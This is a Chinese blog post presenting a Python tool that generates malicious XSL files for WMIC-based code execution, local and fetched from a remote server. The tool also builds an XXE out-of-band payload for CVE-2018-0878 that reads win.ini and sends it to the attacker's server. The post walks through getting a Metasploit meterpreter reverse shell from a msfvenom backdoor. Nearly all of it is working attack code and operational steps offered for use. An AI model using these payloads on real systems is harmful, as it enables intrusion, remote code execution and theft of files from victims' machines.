python打造XslGenerator

Posted 2020-11-11 东京$

0x00前言

---

今天加载了Demon哥分享的RSS。其中有一篇是三好学生讲的：

 

 在仔细越读这篇文章后，我懂得了里面的一些骚操作，所以有了以下的

脚本。

0x001代码

---

 

import optparse
import time
import os
import socket

def main():
    parser=optparse.OptionParser()
    parser.add_option(\'-b\',dest=\'local\',action=\'store_true\',help=\'Generator Local Xsl\')
    parser.add_option(\'-y\',dest=\'Long\',action=\'store_true\',help=\'Generator Long-range Xsl\')
    parser.add_option(\'-j\',dest=\'CVE\',action=\'store_true\',help=\'Conduct CVE-2018-0878\')
    (options,args)=parser.parse_args()
    if options.local:
        Local()
    elif options.Long:
        Long()
    elif options.CVE:
        Cve()
    else:
        parser.print_help()
        exit()

def Local():
    with open(\'poc.xsl\',\'w\') as l:
        l.write(\'\'\'<?xml version="1.0"?>
<!-- Copyright (c) Microsoft Corporation.  All rights reserved. -->
<xsl:stylesheet version="1.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="urn:my-scripts">
<xsl:output encoding="utf-16" omit-xml-declaration="yes"/>
<xsl:param name="norefcomma"/>

<msxsl:script language="JScript" implements-prefix="user">
   function myFunction() {
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
          return "";      
   }
</msxsl:script>

<xsl:template match="/">

<xsl:value-of select="user:myFunction()"/>

Node,<xsl:for-each select="COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.ARRAY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.REFERENCE"><xsl:value-of select="@NAME"/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each><xsl:apply-templates select="COMMAND/RESULTS"/></xsl:template> 


<xsl:template match="RESULTS" xml:space="preserve"><xsl:apply-templates select="CIM/INSTANCE"/></xsl:template> 
<xsl:template match="VALUE.ARRAY" xml:space="preserve">{<xsl:for-each select="VALUE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">;</xsl:if></xsl:for-each>}</xsl:template>
<xsl:template match="VALUE" xml:space="preserve"><xsl:value-of select="."/></xsl:template>
<xsl:template match="INSTANCE" xml:space="preserve">
<xsl:value-of select="../../@NODE"/>,<xsl:for-each select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each></xsl:template> 

<xsl:template match="PROPERTY.REFERENCE" xml:space="preserve"><xsl:apply-templates select="VALUE.REFERENCE"></xsl:apply-templates></xsl:template>

<xsl:template match="PROPERTY"><xsl:apply-templates select="VALUE"/></xsl:template>
<xsl:template match="PROPERTY.ARRAY"><xsl:for-each select="VALUE.ARRAY"><xsl:apply-templates select="."/></xsl:for-each></xsl:template>

<xsl:template match="VALUE.REFERENCE">"<xsl:apply-templates select="INSTANCEPATH/NAMESPACEPATH"/><xsl:apply-templates select="INSTANCEPATH/INSTANCENAME|INSTANCENAME"/>"</xsl:template>

<xsl:template match="NAMESPACEPATH">\\\\<xsl:value-of select="HOST/text()"/><xsl:for-each select="LOCALNAMESPACEPATH/NAMESPACE">\\<xsl:value-of select="@NAME"/></xsl:for-each>:</xsl:template>

<xsl:template match="INSTANCENAME"><xsl:value-of select="@CLASSNAME"/><xsl:for-each select="KEYBINDING"><xsl:if test="position()=1">.</xsl:if><xsl:value-of select="@NAME"/>="<xsl:value-of select="KEYVALUE/text()"/>"<xsl:if test="position()!=last()"></xsl:if><xsl:if test="not($norefcomma=&quot;true&quot;)">,</xsl:if><xsl:if test="$norefcomma=&quot;true&quot;"><xsl:text> </xsl:text></xsl:if></xsl:for-each></xsl:template>


</xsl:stylesheet>
        \'\'\')
        l.close()
        print(\'[*]{}\'.format(\'Generation completion\'))
        print(\'[*]{}\'.format(\'you want to bounce meterpreter.Please create the back door and put the generated back door inito the clear computer,and use modify.py to modify the place where exe is executed\'))
        print(\'[*]{}\'.format(\'Enter the directory where you store poc.xsl and exeute the command in the target computer: wmic os get format:poc\'))

def Long():
    with open(\'Longpoc.xsl\',\'w\') as g:
        g.write(\'\'\'<?xml version=\'1.0\'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]> </ms:script>
</stylesheet>
        \'\'\')
        g.close()
        print(\'[*]{}\'.format(\'Generation completion\'))
        os.system(\'mv Longpoc.xsl /var/www/html\')
        print(\'[*]{}\'.format(\'This XSL is moved to the /var/www/html directory\'))
        print(\'[*]{}\'.format(\'Modify the program executed in XLS with modify.py\'))
        print(\'[*]{}\'.format(\'Put the generated back door into the target computer\'))
        print(\'[*]{}\'.format(\'Start the Apache service\'))
        print(\'[*]{}\'.format(\'wmic os get format:"http://IP/Longpoc.xsl"\'))

def Cve():
    print(\'[@]Vulnerability introduction:https://www.exploit-db.com/exploits/44352/\')
    s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
    connect=s.connect((\'8.8.8.8\',80))
    ip=s.getsockname()[0]
    ml="python -m SimpleHTTPServer 8080"
    with open(\'xxe.xml\',\'w\') as c:
        c.write(\'\'\'<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM \'http://{}/?%payload;\'> ">  
        \'\'\'.format(ip))
        c.close()
        os.system(\'mv payload.xls /var/www/html\')

    with open(\'payload.xsl\',\'w\') as p:
        p.write(\'\'\'<?xml version="1.0" encoding="UTF-8" ?>  
<!DOCTYPE zsl [  
<!ENTITY % remote SYSTEM "http://{}:8080/xxe.xml">  
%remote;%root;%oob;]>
        \'\'\'.format(ip))
        p.close()
        print(\'[*]{}\'.format(\'Get the native IP:\',ip))
        print(\'[*]{}\'.format(\'Create a httt server\'))
        print(\'[*]{}\'.format(\'Have been created xxe.xml\'))
        print(\'[*]{}\'.format(\'Already moved /var/www/html\'))
        print(\'[*]{}\'.format(\'Have benn payload.xls,Move him to the computer,And execute the command:wmic os get format:payload.xsl\'))
        os.system(ml)
if __name__ == \'__main__\':
    main()

测试结果： -b

攻击机：Ubuntu

受害者：windows server 2008 r2

生成后并修改后的的xsl

msfvenom生成的shell.exe

 Windows Server 2008 r2

 进入shell.exe所在的目录中在cmd中执行：wmic os get /format:sd

Ubuntu中执行监听：

use exploit/multi/headers
set LHOST 192.168.223.133
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

测试结果：-j   CVE-2018-0878

漏洞结果详情：https://www.exploit-db.com/exploits/44352/

生成了xxe.xml与payload.xls

xxe.xml移动到了/var/www/html  

payload.xls放入到受害者windows server 2008 r2

xxe.xml:

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM \'http://192.168.223.133:8080/?%payload;\'> ">  

payload.xsl:

<?xml version="1.0" encoding="UTF-8" ?>  
<!DOCTYPE zsl [  
<!ENTITY % remote SYSTEM "http://192.168.223.133:8080/xxe.xml">  
%remote;%root;%oob;]>

 启动apache服务

service apache2 start

在windows server 2008 r2中执行：

wmic os get /format:payload.xsl

执行失败但漏洞触发成功了。

 

这里的-b选项我就不演示了，具体步骤跟上面两个差不多

1.生成的poc.xsl修改在目标机上执行的程序并移动到apache2

2.开启apache2

3.将生成的后门扔到目标机

4.执行wmic os get /format:"http://192.168.223.133/poc.xsl"

这时候wmic就会请求xsl并执行。你如果此刻在监听你就收到了一个shell